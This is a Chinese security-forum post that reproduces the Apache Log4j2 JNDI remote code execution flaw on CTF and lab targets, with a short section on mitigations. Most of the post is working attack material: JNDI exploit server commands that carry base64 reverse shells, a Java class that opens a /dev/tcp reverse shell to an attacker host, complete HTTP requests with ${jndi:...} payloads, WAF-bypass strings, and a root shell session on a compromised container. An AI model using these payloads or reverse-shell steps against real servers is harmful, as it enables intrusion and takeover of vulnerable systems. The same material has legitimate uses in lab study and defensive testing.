Apache Log4j2任意代码执行漏洞复现

atkx   ·   发表于 2022-03-12 18:43:33   ·   漏洞文章

0x00 漏洞介绍

漏洞简介

Apache Log4j2 是一款优秀的 Java 日志框架。2021 年 11 月 24 日,阿里云安全团队向 Apache 官方报告了 Apache Log4j2 远程代码执行漏洞。由于 Apache Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink 等均受影响。

基本原理

apache 的 log4j2 版本,在打印日志内容时,使用了一个 lookup 函数,如果数据中存在${xxxx}这样的格式的数据,那 log4j 就会将该数据当做资源地址进行请求,如果说这串数据是一个 ldap 服务的资源地址,那么就可能造成 JNDI 注入,从而导致 RCE,因此也可以说该漏洞是一个 JDNI 注入漏洞。

0x01 影响范围

版本:Apache Log4j 2.x < 2.15.0-rc2

含有该漏洞的 Log4j 影响到超过 6000 个中间件或应用,目前已知的可能受影响的应用及组件包括但不限于如下清单中所列出的:

  • Spring-Boot-strater-log4j2
  • Apache Struts2
  • Apache Solr
  • Apache Flink
  • Apache Druid
  • ElasticSearch
  • Flume
  • Dubbo
  • Redis
  • Logstash
  • Kafka

    0x02 漏洞修复

    1)升级 log4j2 到最新的 log4j-2.15.0 版本。 官方升级的防御方法:

只允加载被允许的 ldap 资源文件 只允许加载固定的 ldap 资源地址 2)修改配置信息 在项目的 log4j2.component.properties 配置文件中添加配置(值得注意的是该方法只适用于 log4j-2.10.0 以上版本):

  1. log4j2.formatMsgNoLookups = true

也可以在 java 的启动项中添加该配置:

  1. Dlog4j2.formatMsgNoLookups=true

3)使用各种软硬件 waf

0x03 漏洞复现

漏洞复现需要 java 环境

  1. apt-get update
  2. apt install default-jre
  3. apt install openjdk-8-jdk
  4. apt install openjdk-8-jre-headless

姿势 1

Vulfocus log4j2-rce 靶机
环境来自https://www.ctfer.vip/
1
抓包

然后用 vps 起 jndi 和 nc 监听,安全组要开放 1099、1389、8180 几个端口

  1. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "1.2.3.4"

监听

  1. nc -lnvp 6666

POST 传入 payload

  1. /hello
  2. payload=${jndi:rmi://ip:1099/e6hn8w}

复现成功
2

复现过程

  1. root@atkx:/var/www/ctf# ls
  2. JNDIExploit-1.2-SNAPSHOT.jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar marshalsec-0.0.3-SNAPSHOT-all.jar test1
  3. root@atkx:/var/www/ctf# java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTkuMTIyLjI1NC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "vps"
  4. [ADDRESS] >> vps
  5. [COMMAND] >> bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTkuMTIyLjI1NC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}
  6. ----------------------------JNDI Links----------------------------
  7. Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
  8. rmi://vps:1099/46zkaz
  9. ldap://vps:1389/46zkaz
  10. Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
  11. rmi://vps:1099/e6hn8w
  12. Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
  13. rmi://vps:1099/tgf9tx
  14. ldap://vps:1389/tgf9tx
  15. ----------------------------Server Log----------------------------
  16. 2021-12-15 18:55:08 [JETTYSERVER]>> Listening on 0.0.0.0:8180
  17. 2021-12-15 18:55:08 [RMISERVER] >> Listening on 0.0.0.0:1099
  18. 2021-12-15 18:55:08 [LDAPSERVER] >> Listening on 0.0.0.0:1389
  19. 2021-12-15 18:55:48 [RMISERVER] >> Have connection from /1.14.71.254:35328
  20. 2021-12-15 18:55:49 [RMISERVER] >> Reading message...
  21. 2021-12-15 18:55:49 [RMISERVER] >> Is RMI.lookup call for e6hn8w 2
  22. 2021-12-15 18:55:49 [RMISERVER] >> Sending local classloading reference.
  23. WARNING: An illegal reflective access operation has occurred
  24. WARNING: Illegal reflective access by util.Reflections (file:/var/www/ctf/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar) to field com.sun.jndi.rmi.registry.ReferenceWrapper.wrappee
  25. WARNING: Please consider reporting this to the maintainers of util.Reflections
  26. WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
  27. WARNING: All illegal access operations will be denied in a future release
  28. 2021-12-15 18:55:49 [RMISERVER] >> Closing connection
  29. 2021-12-15 18:55:50 [RMISERVER] >> Have connection from /1.14.71.254:35330
  30. 2021-12-15 18:55:50 [RMISERVER] >> Reading message...
  31. 2021-12-15 18:55:50 [RMISERVER] >> Is RMI.lookup call for e6hn8w 2
  32. 2021-12-15 18:55:50 [RMISERVER] >> Sending local classloading reference.
  33. 2021-12-15 18:55:50 [RMISERVER] >> Closing connection
  34. 2021-12-15 18:55:50 [RMISERVER] >> Have connection from /1.14.71.254:35334
  35. 2021-12-15 18:55:50 [RMISERVER] >> Reading message...
  36. 2021-12-15 18:55:50 [RMISERVER] >> Is RMI.lookup call for e6hn8w 2
  37. 2021-12-15 18:55:50 [RMISERVER] >> Sending local classloading reference.
  38. 2021-12-15 18:55:50 [RMISERVER] >> Closing connection
  39. 2021-12-15 18:55:51 [RMISERVER] >> Have connection from /1.14.71.254:35338
  40. 2021-12-15 18:55:51 [RMISERVER] >> Reading message...
  41. 2021-12-15 18:55:51 [RMISERVER] >> Is RMI.lookup call for e6hn8w 2
  42. 2021-12-15 18:55:51 [RMISERVER] >> Sending local classloading reference.
  43. 2021-12-15 18:55:51 [RMISERVER] >> Closing connection

另开窗口监听

  1. root@atkx:~# nc -lnvp 6666
  2. Listening on [0.0.0.0] (family 0, port 6666)
  3. Connection from 1.14.71.254 47878 received!
  4. bash: cannot set terminal process group (1): Inappropriate ioctl for device
  5. bash: no job control in this shell
  6. root@c24ad0372627:/demo# id
  7. id
  8. uid=0(root) gid=0(root) groups=0(root)
  9. root@c24ad0372627:/demo# whoami
  10. whoami
  11. root
  12. root@c24ad0372627:/demo# env
  13. env
  14. HOSTNAME=c24ad0372627
  15. PWD=/demo
  16. HOME=/root
  17. LS_COLORS=
  18. FLAG=NSSCTF{1a105ee4-cb02-4a07-99ef-3645c451eb6a}
  19. SHLVL=2
  20. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  21. _=/usr/bin/env
  22. root@c24ad0372627:/demo#

Payload

  1. POST /hello HTTP/1.1
  2. Host: 1.14.71.254:28035
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/x-www-form-urlencoded
  8. Content-Length: 48
  9. Origin: http://1.14.71.254:28035
  10. Connection: close
  11. Referer: http://1.14.71.254:28035/hello
  12. Upgrade-Insecure-Requests: 1
  13. payload=${jndi:rmi://vps:1099/e6hn8w}

姿势 2

掌控安全-Log4j2 靶场
靶场地址:http://d63bb2586.lab.aqlab.cn/
工具地址:https://github.com/RandomRobbieBF/marshalsec-jar
3
1、构造反序列化 Exp.java,改一下 ip 就好了

  1. import java.lang.Runtime;
  2. import java.lang.Process;
  3. public class Exp {
  4. static {
  5. try {
  6. Runtime rt = Runtime.getRuntime();
  7. String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/ip/6666 0>&1"};
  8. Process pc = rt.exec(commands);
  9. pc.waitFor();
  10. } catch (Exception e) {
  11. // do nothing
  12. }
  13. }
  14. }

2、用 javac 编译一下

  1. javac Exp.java

3、将刚刚得到的 class 放入我们即将开启的 web 目录里面,然后开启

  1. root@atkx:/var/www/ctf/test1# ls
  2. Exp.class Exp.java
  3. root@atkx:/var/www/ctf/test1# python -m SimpleHTTPServer 5555
  4. 或者
  5. root@atkx:/var/www/ctf/test1# python3 -m http.server 5555

4、访问效果可以看一下
4
5、然后执行以下命令

  1. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ip/#Exp" 5556

遇到报错了

  1. root@atkx:/var/www/ctf# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://vps:5555/#Exp" 5556

6、nc 开启监听命令 监听上面 java 里面的端口

  1. nc -lnvp 6666

7、准备工作搞完了,就直接 payload

  1. ${jndi:ldap://ip:5556/Exp}

复现成功
5

姿势 3

Apache log4j 漏洞靶机 靶机环境来自https://www.ctfer.vip/
工具地址:https://github.com/feihong-cs/JNDIExploit
也可以使用 Log4j2 漏洞环境进行复现,环境下载地址:https://github.com/fengxuangit/log4j_vuln

docker创建环境命令:

  1. docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
  2. docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
  3. docker exec -it log4j_vuln_container /bin/bash
  4. /bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh

靶机
6
执行

  1. java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip

然后监听

  1. nc -lnvp 6666

然后 POST 传入

  1. /webstudy/hello-fengxuan
  2. c=${jndi:ldap://ip:1389/Basic/Command/Base64/Base编码}

反弹 shell 成功
7
命令执行ByPass

  1. $ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip -l 1389 -p 5555
  2. [+] LDAP Server Start Listening on 1389...
  3. [+] HTTP Server Start Listening on 5555...

payload 传入

  1. POST /hello HTTP/1.1
  2. Host: 1.14.71.254:28009
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/x-www-form-urlencoded
  8. Content-Length: 66
  9. Origin: http://1.14.71.254:28009
  10. Connection: close
  11. Referer: http://1.14.71.254:28009/hello
  12. Upgrade-Insecure-Requests: 1
  13. cmd: whoami
  14. payload=${jndi:ldap://vps:1389/TomcatByPass/TomcatEcho}

复现成功
8
但是貌似这种方法弹不了 shell,不知道是不是我的问题。。。。
log4shell-vulnerable-app 靶机
入口路由/,参数为 X-Api-Version 请求头 https://github.com/christophetd/log4shell-vulnerable-app

最后附一款 GUI 工具,项目地址:
GitHub - inbug-team/Log4j_RCE_Tool:Log4j 多线程批量检测利用工具

0x04 ByPass

一些Bypass技巧

  1. ${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp}
  2. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://vps:1099/dj05um}

参考文章:
https://mp.weixin.qq.com/s/lQhG7MOFurKsSP5yz1b3EA https://gylq.gitee.io/posts/180.html https://blog.csdn.net/weixin_42891146/article/details/121871851

用户名金币积分时间理由
Track-劲夫 70.00 0 2022-03-15 14:02:47 一个受益终生的帖子~~

打赏我,让我更有动力~

附件列表

JNDIExploit-1.2-SNAPSHOT.zip   文件大小:33.847M (下载次数:36)

JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip   文件大小:9.186M (下载次数:24)

marshalsec-0.0.3-SNAPSHOT-all.zip   文件大小:36.702M (下载次数:17)

2 条回复   |  直到 2022-4-6 | 2690 次浏览

没勇气先生
发表于 2022-3-31

不明觉厉

评论列表

  • 加载数据中...

编写评论内容

yangroupaomo
发表于 2022-4-6

666

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.